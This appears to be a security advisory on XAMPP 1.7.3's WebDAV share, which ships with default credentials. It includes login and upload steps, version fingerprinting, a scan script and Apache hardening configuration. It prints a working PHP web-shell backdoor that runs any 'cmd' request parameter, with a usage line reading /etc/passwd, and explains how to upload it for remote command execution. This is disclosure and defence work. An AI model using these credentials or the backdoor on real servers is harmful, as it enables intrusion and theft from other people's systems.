The WebDAV module (mod_dav) of the Apache server bundled with XAMPP version 1.7.3 or lower is enabled by default, and it ships with a pre-created account whose username and password are the same on every installation.

Because WebDAV is an often overlooked and underused feature of the server, the default credentials for the WebDAV account are most likely left unchanged by the server administrator.

The XAMPP security setup page neither mentions that WebDAV is enabled by default nor asks the administrator to change the default username and password. This design choice leaves many XAMPP instances open to remote attack: anyone who can reach the server over HTTP can authenticate with the published defaults and write files into the /webdav/ share.
 
To test whether your XAMPP site has WebDAV enabled with default credentials, you can follow the instructions below:
COMMANDS
Linux:

1. download/install cadaver (a command-line WebDAV client)

apt-get install cadaver

2. login to the XAMPP server's WebDAV folder (cadaver prompts for the username and password; these are the XAMPP defaults)

cadaver http://<REMOTE HOST>/webdav/
user: wampp
pass: xampp

3. upload a file to the webdav folder (create the local file first, e.g. echo hello > /tmp/helloworld.txt)

put /tmp/helloworld.txt

4. browse to your uploaded file to confirm that the server stores and serves it

load URL, http://<REMOTE HOST>/webdav/helloworld.txt, in browser

If the login in step 2 succeeds and the put in step 3 returns without an authorization error, the server accepts the default credentials and is affected. Remove the test file afterwards with: delete helloworld.txt

SOFTWARE USED
Vulnerable software (Windows version) download:

PHP-based payload (acquired from BackTrack 5.1): 

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
// Executes the value of the "cmd" request parameter with system() and
// returns its output inside a <pre> block; no authentication, no filtering.
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!--    http://michaeldaw.org   2006    -->

DETAILED INFORMATION
To identify the version of XAMPP running on a server, look at the Server header in the Apache HTTP response. The example below shows the HTTP header of a server running XAMPP 1.7.3. Note the Apache version bundled with that XAMPP release: Apache 2.2.14 shipped with XAMPP 1.7.3, so the Apache version is a usable proxy for the XAMPP version. If the Apache version is 2.2.14 or lower, then the XAMPP version (if the host runs XAMPP at all) is 1.7.3 or lower, and the host is possibly vulnerable to the WebDAV default-credential design flaw.

Two caveats apply. The Server header only carries a version number when Apache's ServerTokens directive is at its default (Full); a trimmed header such as "Apache" alone rules nothing out. And Apache 2.2.14 is also used outside XAMPP, so a matching version only makes XAMPP a candidate. Having found Apache 2.2.14 or lower, you still need to determine whether XAMPP is installed. You can do that by requesting the XAMPP status URL on the host, http://<REMOTE HOST>/xampp/ (http://localhost/xampp/ when testing your own machine). If an HTTP authentication window appears (a 401 response), XAMPP is most likely in use on the server.

Once you have identified an XAMPP installation of 1.7.3 or lower, use the commands in the COMMANDS section above to log in to the remote server with the default credentials and upload a file.
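The fingerprinting steps just described and the cadaver walkthrough in the COMMANDS section, combined into one added example script (this is not code from the original post): it reads the Server header, classifies the Apache version against 2.2.14, checks /xampp/ for a 401, and then exercises the default WebDAV account with curl by PROPFIND, PUT, GET and DELETE of a marker file. Assumptions, as noted in the comments: curl, sed and awk are installed; the account is wampp:xampp at /webdav/ as the post states; curl's --anyauth is used because the post does not say whether the realm uses Basic or Digest authentication; the sample Server header in the comments is constructed, not captured.

```shell
#!/bin/sh
# Added example (not from the original post). Assumes curl, sed and awk;
# the default account wampp:xampp and the /webdav/ share per the post; and
# that a 401 on /xampp/ is the "HTTP authentication window" hint.

DAV_USER="wampp"
DAV_PASS="xampp"
MAX_APACHE="2.2.14"   # Apache version bundled with XAMPP 1.7.3 (per the post)

# Pull the Apache version out of a Server header line. Constructed sample:
# "Server: Apache/2.2.14 (Win32) DAV/2" -> "2.2.14". Prints nothing when
# ServerTokens hides the version, so callers must handle an empty result.
apache_version_from_header() {
    printf '%s\n' "$1" | sed -n 's|.*Apache/\([0-9][0-9.]*\).*|\1|p'
}

# version_le A B: exit 0 when dotted version A <= B, compared numerically per
# component (so "2.2.9" <= "2.2.14", which a plain string compare gets wrong).
version_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        k = (n > m) ? n : m
        for (i = 1; i <= k; i++) {
            xi = (i in x) ? x[i] + 0 : 0
            yi = (i in y) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 0
    }'
}

# Classify a Server header: "candidate" when Apache <= 2.2.14 (XAMPP <= 1.7.3
# is possible), "newer" when above, "unknown" when no version is exposed.
classify_server_header() {
    v=$(apache_version_from_header "$1")
    if [ -z "$v" ]; then
        echo unknown
    elif version_le "$v" "$MAX_APACHE"; then
        echo candidate
    else
        echo newer
    fi
}

# HTTP status code of one authenticated request. --anyauth lets curl pick
# Basic or Digest from the server's WWW-Authenticate challenge.
http_status() {   # http_status METHOD URL [extra curl args...]
    m=$1; u=$2; shift 2
    curl -s -o /dev/null -w '%{http_code}' --anyauth -u "$DAV_USER:$DAV_PASS" \
        -X "$m" "$@" "$u"
}

# Full check against one host: fingerprint, then try the default credentials
# by PROPFIND, PUT a marker file, GET it back, and DELETE it again.
check_host() {
    host=$1
    hdr=$(curl -sI "http://$host/" | tr -d '\r' | grep -i '^Server:' | head -n 1)
    echo "Server header: ${hdr:-(none)} -> $(classify_server_header "$hdr")"
    echo "/xampp/ status: $(curl -s -o /dev/null -w '%{http_code}' "http://$host/xampp/") (401 suggests XAMPP)"

    code=$(http_status PROPFIND "http://$host/webdav/" -H 'Depth: 0')
    [ "$code" = 207 ] || { echo "PROPFIND returned $code: no WebDAV, or default credentials rejected"; return 1; }

    marker="webdav-check-$$.txt"
    tmp=$(mktemp) || return 1
    printf 'WebDAV default-credential check\n' > "$tmp"
    code=$(curl -s -o /dev/null -w '%{http_code}' --anyauth -u "$DAV_USER:$DAV_PASS" \
        -T "$tmp" "http://$host/webdav/$marker")
    rm -f "$tmp"
    case $code in
        201|204) ;;
        *) echo "PUT returned $code: authenticated but cannot write"; return 1 ;;
    esac
    echo "VULNERABLE: uploaded http://$host/webdav/$marker as $DAV_USER:$DAV_PASS"
    echo "GET of the marker returned: $(http_status GET "http://$host/webdav/$marker")"
    http_status DELETE "http://$host/webdav/$marker" >/dev/null   # clean up
}

# Usage: sh xampp-webdav-check.sh <REMOTE HOST>
if [ $# -ge 1 ]; then
    check_host "$1"
fi
```

Run it as sh xampp-webdav-check.sh <REMOTE HOST>; the version helpers are kept separate from the network code so the classification can be checked offline against captured headers. A 207 on PROPFIND already proves the account works; the PUT/GET/DELETE round trip additionally proves that files land in a directory the server serves back, which is what makes the PHP payload in the next paragraph reachable.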

To show the potential impact of this design flaw: an attacker could use the WebDAV account to upload a PHP-based payload that gives remote command execution on the hosting server. An example of such a payload is the simple backdoor listed under SOFTWARE USED above. Once it is uploaded to /webdav/, Apache hands the .php file to the PHP interpreter like any other script, so requesting it with a cmd parameter runs that command as the web server's user. Note that the Usage line in the payload shows a Linux command; on a Windows XAMPP host substitute a Windows command such as whoami or dir.

COUNTERMEASURES
To fix the WebDAV default-credentials vulnerability, upgrade to the latest version of XAMPP, change the WebDAV username and password, or use a different hosting solution. If WebDAV is not actually used, the safest option is to disable it entirely rather than only changing the password, since a changed password still leaves an authenticated upload path on the server. This design vulnerability was addressed in XAMPP v1.7.4: the WebDAV account is no longer enabled by default and the default password is randomized.
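The two countermeasures that keep the existing installation (disable WebDAV, or keep it with a fresh account) as an added Apache configuration example. This is a generic snippet, not XAMPP's shipped httpd-dav.conf: the Location path matches the post, but the realm name, password file path and account name are assumptions, and the directives are written for Apache 2.4 (the comment gives the 2.2 equivalent).

```apache
# Added example, not XAMPP's own httpd-dav.conf. Use ONE of the two blocks.

# Option A: WebDAV is not needed, so do not expose the share at all.
<Location "/webdav">
    Dav Off
    Require all denied
    # Apache 2.2 equivalent of the line above:
    #   Order deny,allow
    #   Deny from all
</Location>

# Option B: keep WebDAV, but only for a new account with a new password,
# created with: htpasswd -c /path/to/dav.passwd newdavuser
# (the old wampp account is simply absent from the new password file)
<Location "/webdav">
    Dav On
    AuthType Basic
    AuthName "WebDAV"
    AuthUserFile "/path/to/dav.passwd"
    Require valid-user
    # Basic credentials travel in the clear; refuse plain HTTP for this path
    # (drop this line only if the server has no TLS listener at all).
    SSLRequireSSL
</Location>
```

After editing, restart Apache and re-run the check from the COMMANDS section: the cadaver login with wampp/xampp must now fail, and with Option A the PROPFIND must be refused for every user.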